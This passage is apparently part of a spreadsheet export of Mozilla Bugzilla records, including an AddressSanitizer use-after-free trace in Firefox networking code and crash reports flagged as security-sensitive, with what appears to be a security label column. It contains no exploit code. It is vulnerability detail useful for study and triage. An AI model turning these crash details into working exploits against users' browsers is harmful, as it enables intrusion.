    #33 0x7f444a5cd0c9 in nsGlobalWindowOuter::OpenInternal(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsDocShellLoadState*, bool, nsGlobalWindowOuter::PrintKind, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:7172:21
    #34 0x7f444a5d1fef in nsGlobalWindowOuter::OpenJS(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:5805:10
    #35 0x7f444a5d1b48 in nsGlobalWindowOuter::OpenOuter(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:5769:17
    #36 0x7f444a579873 in nsGlobalWindowInner::Open(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:3991:3
    #37 0x7f444bc2d0c9 in mozilla::dom::Window_Binding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/obj-build/dom/bindings/WindowBinding.cpp:2704:59
    #38 0x7f444c40aead in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3300:13
    #39 0x1a94d8ac48bf  (&lt;unknown module&gt;)
0x61c0001c0100 is located 128 bytes inside of 1824-byte region [0x61c0001c0080,0x61c0001c07a0)
freed by thread T0 (Web Content) here:
    #0 0x5578b600f8a2 in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:127:3
    #1 0x7f4447fd266b in operator delete /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51:10
    #2 0x7f4447fd266b in mozilla::net::HttpChannelChild::Release() /builds/worker/checkouts/gecko/netwerk/protocol/http/HttpChannelChild.cpp:199:7
    #3 0x7f444800334e in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #4 0x7f444800334e in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #5 0x7f444800334e in assign_assuming_AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:69:7
    #6 0x7f444800334e in operator= /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:168:5
    #7 0x7f444800334e in Revoke /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:760:24
    #8 0x7f444800334e in Revoke /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1214:15
    #9 0x7f444800334e in ~RunnableMethodImpl /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1174:35
    #10 0x7f444800334e in mozilla::detail::RunnableMethodImpl&lt;mozilla::net::HttpChannelChild*, void (mozilla::net::HttpChannelChild::*)(), true, (mozilla::RunnableKind)0&gt;::~RunnableMethodImpl() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1174:33
    #11 0x7f444723ec85 in mozilla::Runnable::Release() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:60:1
    #12 0x7f44472688cc in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #13 0x7f44472688cc in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #14 0x7f44472688cc in assign_assuming_AddRef /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:69:7
    #15 0x7f44472688cc in operator= /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:168:5
    #16 0x7f44472688cc in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:468:15
    #17 0x7f4447234f62 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770:26
    #18 0x7f4447232798 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606:15
    #19 0x7f4447232ec0 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390:36
    #20 0x7f444726ff54 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:126:37
    #21 0x7f444726ff54 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_1&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531:5
    #22 0x7f444725150b in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1148:16
    #23 0x7f444725b42c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467:10
    #24 0x7f444e3a02ac in bool mozilla::SpinEventLoopUntil&lt;(mozilla::ProcessFailureBehavior)1, mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::BrowserChild*, nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**)::$_8&gt;(mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::BrowserChild*, nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**)::$_8&amp;&amp;, nsIThread*) /builds/worker/workspace/obj-build/dist/include/mozilla/SpinEventLoopUntil.h:93:25
    #25 0x7f444e39d2fb in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::BrowserChild*, nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/ipc/ContentChild.cpp:1227:5
    #26 0x7f444e3fd899 in mozilla::dom::BrowserChild::ProvideWindow(nsIOpenWindowInfo*, unsigned int, bool, bool, nsIURI*, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, nsDocShellLoadState*, bool*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:851:14
    #27 0x7f4452cc2ff9 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, bool, nsIArray*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:842:24
    #28 0x7f4452cc7188 in nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, bool, nsISupports*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:376:10
    #29 0x7f444a5cd0c9 in nsGlobalWindowOuter::OpenInternal(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsDocShellLoadState*, bool, nsGlobalWindowOuter::PrintKind, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:7172:21
    #30 0x7f444a5d1fef in nsGlobalWindowOuter::OpenJS(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:5805:10
    #31 0x7f444a5d1b48 in nsGlobalWindowOuter::OpenOuter(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:5769:17
    #32 0x7f444a579873 in nsGlobalWindowInner::Open(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:3991:3
previously allocated by thread T0 (Web Content) here:
    #0 0x5578b600fb0d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
    #1 0x5578b6049b4d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f4447e943f1 in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f4447e943f1 in mozilla::net::nsHttpHandler::NewProxiedChannel(nsIURI*, nsIProxyInfo*, unsigned int, nsIURI*, nsILoadInfo*, nsIChannel**) /builds/worker/checkouts/gecko/netwerk/protocol/http/nsHttpHandler.cpp:2067:19
    #4 0x7f444754ae6a in mozilla::net::nsIOService::NewChannelFromURIWithProxyFlagsInternal(nsIURI*, nsIURI*, unsigned int, nsILoadInfo*, nsIChannel**) /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:1106:15
    #5 0x7f444754a93a in mozilla::net::nsIOService::NewChannelFromURIWithProxyFlagsInternal(nsIURI*, nsIURI*, unsigned int, nsINode*, nsIPrincipal*, nsIPrincipal*, mozilla::Maybe&lt;mozilla::dom::ClientInfo&gt; const&amp;, mozilla::Maybe&lt;mozilla::dom::ServiceWorkerDescriptor&gt; const&amp;, unsigned int, nsIContentPolicy::nsContentPolicyType, unsigned int, nsIChannel**) /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:1078:10
    #6 0x7f444754a879 in mozilla::net::nsIOService::NewChannelFromURIWithClientAndController(nsIURI*, nsINode*, nsIPrincipal*, nsIPrincipal*, mozilla::Maybe&lt;mozilla::dom::ClientInfo&gt; const&amp;, mozilla::Maybe&lt;mozilla::dom::ServiceWorkerDescriptor&gt; const&amp;, unsigned int, nsIContentPolicy::nsContentPolicyType, unsigned int, nsIChannel**) /builds/worker/checkouts/gecko/netwerk/base/nsIOService.cpp:1050:10
    #7 0x7f4447573ec4 in NS_NewChannelInternal(nsIChannel**, nsIURI*, nsINode*, nsIPrincipal*, nsIPrincipal*, mozilla::Maybe&lt;mozilla::dom::ClientInfo&gt; const&amp;, mozilla::Maybe&lt;mozilla::dom::ServiceWorkerDescriptor&gt; const&amp;, unsigned int, nsIContentPolicy::nsContentPolicyType, nsICookieJarSettings*, mozilla::dom::PerformanceStorage*, nsILoadGroup*, nsIInterfaceRequestor*, unsigned int, nsIIOService*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:426:20
    #8 0x7f4447574df7 in NS_NewChannel(nsIChannel**, nsIURI*, nsINode*, unsigned int, nsIContentPolicy::nsContentPolicyType, mozilla::dom::PerformanceStorage*, nsILoadGroup*, nsIInterfaceRequestor*, unsigned int, nsIIOService*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:553:10
    #9 0x7f444e8d87b7 in mozilla::dom::XMLHttpRequestMainThread::CreateChannel() /builds/worker/checkouts/gecko/dom/xhr/XMLHttpRequestMainThread.cpp:2439:10
    #10 0x7f444e8d7c9b in mozilla::dom::XMLHttpRequestMainThread::Open(nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/xhr/XMLHttpRequestMainThread.cpp:1530:3
    #11 0x7f444e8d6e8f in mozilla::dom::XMLHttpRequestMainThread::Open(nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, bool, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/xhr/XMLHttpRequestMainThread.cpp:1385:3
    #12 0x7f444e8d6d63 in mozilla::dom::XMLHttpRequestMainThread::Open(nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/xhr/XMLHttpRequestMainThread.cpp:1374:3
    #13 0x7f444bd2560d in mozilla::dom::XMLHttpRequest_Binding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/obj-build/dom/bindings/XMLHttpRequestBinding.cpp:989:28
    #14 0x7f444c4071df in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3300:13
    #15 0x7f445305df13 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:385:13
    #16 0x7f445305df13 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:472:12
    #17 0x7f445304a496 in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:536:10
    #18 0x7f445304a496 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3239:16
    #19 0x7f445302f845 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:354:13
    #20 0x7f445305dff9 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:504:13
    #21 0x7f445305fbeb in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:549:8
    #22 0x7f44532a8c07 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:928:7 in nsCOMPtr
Shadow bytes around the buggy address:
  0x0c388002ffd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c388002ffe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c388002fff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3880030000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3880030010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c3880030020:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3880030030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3880030040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3880030050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3880030060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3880030070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd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239309==ABORTING
```
This vuln is discovered by bo13oy of Cyber Kunlun Lab.
Thanks.</t>
        </is>
      </c>
      <c r="X6358" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6359">
      <c r="A6359" t="n">
        <v>119068</v>
      </c>
      <c r="B6359" t="inlineStr">
        <is>
          <t>2002-01-09 15:32:18 -0800</t>
        </is>
      </c>
      <c r="C6359" t="inlineStr">
        <is>
          <t>crashes on start-up before reaching profile mgr.</t>
        </is>
      </c>
      <c r="D6359" t="inlineStr">
        <is>
          <t>2002-01-09 16:06:51 -0800</t>
        </is>
      </c>
      <c r="E6359" t="n">
        <v>1</v>
      </c>
      <c r="F6359" t="n">
        <v>1</v>
      </c>
      <c r="G6359" t="n">
        <v>3</v>
      </c>
      <c r="H6359" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6359" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6359" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K6359" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6359" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6359" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N6359" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6359" t="inlineStr"/>
      <c r="Q6359" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6359" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6359" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6359" t="n">
        <v>1</v>
      </c>
      <c r="U6359" t="n">
        <v>0</v>
      </c>
      <c r="V6359" t="n">
        <v>8</v>
      </c>
      <c r="W6359" t="inlineStr">
        <is>
          <t>nsXBLContentSink::HandleEndElement(nsXBLContentSink * const 0x03084728, const 
unsigned short * 0x016360fa) line 267 + 14 bytes
nsExpatDriver::HandleEndElement(const unsigned short * 0x016360fa) line 288 + 22 
bytes
Driver_HandleEndElement(void * 0x030910d0, const char * 0x016360fa) line 78 + 12 
bytes
doContent(void * 0x03096950, int 0, const encoding * 0x01c992e0 
little2_encoding, const char * 0x01661ff6, const char * 0x01663da0, const char * 
* 0x0012f42c) line 1501 + 20 bytes
contentProcessor(void * 0x03096950, const char * 0x01661dd2, const char * 
0x01663da0, const char * * 0x0012f42c) line 1100 + 30 bytes
doProlog(void * 0x03096950, const encoding * 0x01c992e0 little2_encoding, const 
char * 0x01661dd2, const char * 0x01663da0, int 29, const char * 0x01661dd2, 
const char * * 0x0012f42c) line 2388 + 21 bytes
prologProcessor(void * 0x03096950, const char * 0x01661da0, const char * 
0x01663da0, const char * * 0x0012f42c) line 2246 + 36 bytes
prologInitProcessor(void * 0x03096950, const char * 0x01661da0, const char * 
0x01663da0, const char * * 0x0012f42c) line 2235 + 21 bytes
XML_Parse(void * 0x03096950, const char * 0x01661da0, int 8192, int 0) line 920 
+ 40 bytes
nsExpatDriver::ParseBuffer(const char * 0x01661da0, unsigned int 8192, int 0) 
line 591 + 24 bytes
nsExpatDriver::ConsumeToken(nsExpatDriver * const 0x030910d4, nsScanner &amp; {...}, 
int &amp; 0) line 702 + 27 bytes
nsParser::Tokenize(int 0) line 2588 + 26 bytes
nsParser::ResumeParse(int 1, int 0, int 1) line 1846 + 12 bytes
nsParser::OnDataAvailable(nsParser * const 0x030840a4, nsIRequest * 0x03084ad0, 
nsISupports * 0x00000000, nsIInputStream * 0x03085370, unsigned int 0, unsigned 
int 16384) line 2470 + 21 bytes
nsXBLStreamListener::OnDataAvailable(nsXBLStreamListener * const 0x03085f60, 
nsIRequest * 0x03084ad0, nsISupports * 0x00000000, nsIInputStream * 0x03085370, 
unsigned int 0, unsigned int 16384) line 288 + 46 bytes
nsJARChannel::OnDataAvailable(nsJARChannel * const 0x03084ad4, nsIRequest * 
0x03085714, nsISupports * 0x00000000, nsIInputStream * 0x03085370, unsigned int 
0, unsigned int 16384) line 638
nsOnDataAvailableEvent::HandleEvent() line 193 + 70 bytes
nsARequestObserverEvent::HandlePLEvent(PLEvent * 0x03091054) line 116
PL_HandleEvent(PLEvent * 0x03091054) line 590 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x0262dc80) line 520 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x0026025a, unsigned int 49518, unsigned int 0, 
long 40033408) line 1071 + 9 bytes
USER32! 77e13eb0()
USER32! 77e1401a()
USER32! 77e192da()
nsXULWindow::ShowModal(nsXULWindow * const 0x0262d760) line 278
nsWebShellWindow::ShowModal(nsWebShellWindow * const 0x0262d760) line 1097
nsContentTreeOwner::ShowAsModal(nsContentTreeOwner * const 0x0264e6cc) line 432
nsWindowWatcher::OpenWindowJS(nsWindowWatcher * const 0x004df644, nsIDOMWindow * 
0x00000000, const char * 0x004de660, const char * 0x01dfba08, const char * 
0x01dfb584, int 1, unsigned int 1, long * 0x004dc030, nsIDOMWindow * * 
0x0012fb6c) line 699
nsWindowWatcher::OpenWindow(nsWindowWatcher * const 0x004df640, nsIDOMWindow * 
0x00000000, const char * 0x004de660, const char * 0x01dfba08, const char * 
0x01dfb584, nsISupports * 0x004de5b0, nsIDOMWindow * * 0x0012fb6c) line 450 + 48 
bytes
nsProfile::LoadDefaultProfileDir(nsCString &amp; {...}, int 1) line 574 + 94 bytes
nsProfile::StartupWithArgs(nsProfile * const 0x004dee90, nsICmdLineService * 
0x004d5510, int 1) line 418 + 16 bytes
nsAppShellService::DoProfileStartup(nsAppShellService * const 0x004d5290, 
nsICmdLineService * 0x004d5510, int 1) line 238 + 31 bytes
InitializeProfileService(nsICmdLineService * 0x004d5510) line 916 + 31 bytes
main1(int 1, char * * 0x00444c80, nsISupports * 0x00000000) line 1218 + 14 bytes
main(int 1, char * * 0x00444c80) line 1594 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e87903()</t>
        </is>
      </c>
      <c r="X6359" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6360">
      <c r="A6360" t="n">
        <v>873200</v>
      </c>
      <c r="B6360" t="inlineStr">
        <is>
          <t>2013-05-16 12:30:49 -0700</t>
        </is>
      </c>
      <c r="C6360" t="inlineStr">
        <is>
          <t>Add locale information to app detail API</t>
        </is>
      </c>
      <c r="D6360" t="inlineStr">
        <is>
          <t>2013-05-22 12:46:24 -0700</t>
        </is>
      </c>
      <c r="E6360" t="n">
        <v>1</v>
      </c>
      <c r="F6360" t="n">
        <v>1</v>
      </c>
      <c r="G6360" t="n">
        <v>6</v>
      </c>
      <c r="H6360" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6360" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J6360" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K6360" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L6360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6360" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6360" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6360" t="inlineStr">
        <is>
          <t>p=1 [qa+]</t>
        </is>
      </c>
      <c r="Q6360" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6360" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6360" t="inlineStr">
        <is>
          <t>2013-05-23</t>
        </is>
      </c>
      <c r="T6360" t="n">
        <v>1</v>
      </c>
      <c r="U6360" t="n">
        <v>0</v>
      </c>
      <c r="V6360" t="n">
        <v>3</v>
      </c>
      <c r="W6360" t="inlineStr">
        <is>
          <t>This is bug 873198's BFF and can probably be fixed all in one go.  Hanging off of bug 866285 we added language detection support right out of the manifests.  We should include that information in the API *as well as* the default locale.  So, two things to add. :)</t>
        </is>
      </c>
      <c r="X6360" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6361">
      <c r="A6361" t="n">
        <v>1165706</v>
      </c>
      <c r="B6361" t="inlineStr">
        <is>
          <t>2015-05-17 08:26:10 -0700</t>
        </is>
      </c>
      <c r="C6361" t="inlineStr">
        <is>
          <t>Crash [@ SkPixelRef::unlockPixels() ] |  [@ mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&amp;, mozilla::net::ResourceTimingStruct const&amp;) ]</t>
        </is>
      </c>
      <c r="D6361" t="inlineStr">
        <is>
          <t>2016-07-02 10:45:06 -0700</t>
        </is>
      </c>
      <c r="E6361" t="n">
        <v>1</v>
      </c>
      <c r="F6361" t="n">
        <v>1</v>
      </c>
      <c r="G6361" t="n">
        <v>3</v>
      </c>
      <c r="H6361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6361" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6361" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6361" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6361" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6361" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6361" t="inlineStr">
        <is>
          <t>[adv-main41+]</t>
        </is>
      </c>
      <c r="Q6361" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6361" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6361" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6361" t="n">
        <v>1</v>
      </c>
      <c r="U6361" t="n">
        <v>0</v>
      </c>
      <c r="V6361" t="n">
        <v>11</v>
      </c>
      <c r="W6361" t="inlineStr">
        <is>
          <t>Created attachment 8606735
Debug Crash report
1. http://plus.shonenjump.com/client_info/SHUEISHA/html/player/viewer.html?tw=1&amp;lin=1&amp;cid=SHSA_JP01PLUS00001593_57
2. Crash Opt/Debug Nightly on OSX. Doesn't Crash Release.
bp-7508f335-408f-4579-9959-6aa952150517
[@ SkPixelRef::unlockPixels() ]
bp-dd9ca7ab-b5c4-495e-acdb-67ae72150517
[@ mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&amp;, mozilla::net::ResourceTimingStruct const&amp;) ]
Debug
[@ SkImageInfo::validate() ]
Operating system: Mac OS X
                  10.9.5 13F1077
CPU: amd64
     family 6 model 42 stepping 7
     4 CPUs
Crash reason:  EXC_BAD_ACCESS / KERN_INVALID_ADDRESS
Crash address: 0xffffffffbbadbeef
Process uptime: 22 seconds
Thread 45 (crashed)
 0  XUL!SkImageInfo::validate() const [SkBitmap.cpp : 1401 + 0xf]
    rax = 0x00000000bbadbeef   rdx = 0x49003ab2af83cba7
    rcx = 0x000000012994a1b0   rbx = 0x000000012994b000
    rsi = 0x49003ab2af83cba7   rdi = 0x0000390000003a03
    rbp = 0x000000012994a200   rsp = 0x000000012994a1f0
     r8 = 0x0000000000000040    r9 = 0x0000000129949f00
    r10 = 0x000000000000007d   r11 = 0x0000000000000206
    r12 = 0x0000000000005d0f   r13 = 0x0000000000000000
    r14 = 0x00000001288bdfe0   r15 = 0x000000010136c320
    rip = 0x0000000106acddbc
s-s due to badbeef</t>
        </is>
      </c>
      <c r="X6361" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6362">
      <c r="A6362" t="n">
        <v>1843752</v>
      </c>
      <c r="B6362" t="inlineStr">
        <is>
          <t>2023-07-16 01:47:55 -0700</t>
        </is>
      </c>
      <c r="C6362" t="inlineStr">
        <is>
          <t>Crash when reading a malformed NNTP article with an overlong body line</t>
        </is>
      </c>
      <c r="D6362" t="inlineStr">
        <is>
          <t>2024-09-16 00:17:09 -0700</t>
        </is>
      </c>
      <c r="E6362" t="n">
        <v>1</v>
      </c>
      <c r="F6362" t="n">
        <v>1</v>
      </c>
      <c r="G6362" t="n">
        <v>3</v>
      </c>
      <c r="H6362" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6362" t="inlineStr">
        <is>
